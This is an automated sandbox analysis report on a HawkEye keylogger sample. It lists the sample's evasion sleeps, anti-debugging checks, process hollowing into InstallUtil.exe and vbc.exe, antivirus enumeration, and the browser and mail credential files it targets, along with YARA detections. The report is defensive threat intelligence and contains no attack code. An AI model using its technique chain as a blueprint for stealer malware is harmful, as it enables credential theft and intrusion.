Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

7_2_00408836

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\name.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 180000			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Window / User API: threadDelayed 386

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe TID: 2548	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe TID: 2516	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe TID: 1952	Thread sleep count: 340 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe TID: 2516	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2616	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1288	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2316	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2324	Thread sleep time: -140000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2280	Thread sleep time: -77200s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1484	Thread sleep time: -180000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,		6_2_00406EC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,		7_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,		7_2_00407E0E

Contains functionality to query system information

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_004161B0 memset,GetSystemInfo,

7_2_004161B0

Contains medium sleeps (>= 30s)

Source: C:\Users\user\AppData\Roaming\name.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 140000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Thread delayed: delay time: 180000			Jump to behavior

Enumerates the file system

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\			Jump to behavior

Queries a list of all running processes

Source: C:\Users\user\AppData\Roaming\name.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

7_2_00408836

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,

6_2_00404837

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\name.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Roaming\name.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 5.2.InstallUtil.exe.400000.0.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\name.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 7EFDE008			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\name.exe	Queries volume information: C:\Users\user\AppData\Roaming\name.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\name.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\InstallUtil.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Contains functionality to query local / system time

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 7_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,

7_2_0041604B

Contains functionality to query the account / user name

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

6_2_0040724C

Contains functionality to query windows version

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00406278 GetVersionExA,

6_2_00406278

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Roaming\name.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger

Source: Yara match	File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR

Yara detected MailPassView

Source: Yara match	File source: 5.2.InstallUtil.exe.36594d0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.36594d0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2176599122.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 944, type: MEMORYSTR

Searches for Windows Mail specific files

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cert7.db			Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword		6_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword		6_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: ESMTPPassword		6_2_004033D7

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 4.2.name.exe.368a90f.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.36716f0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.36716f0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.36594d0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3491d2f.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2179402637.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2460, type: MEMORYSTR

Remote Access Functionality:

Detected HawkEye Rat

Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp	String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
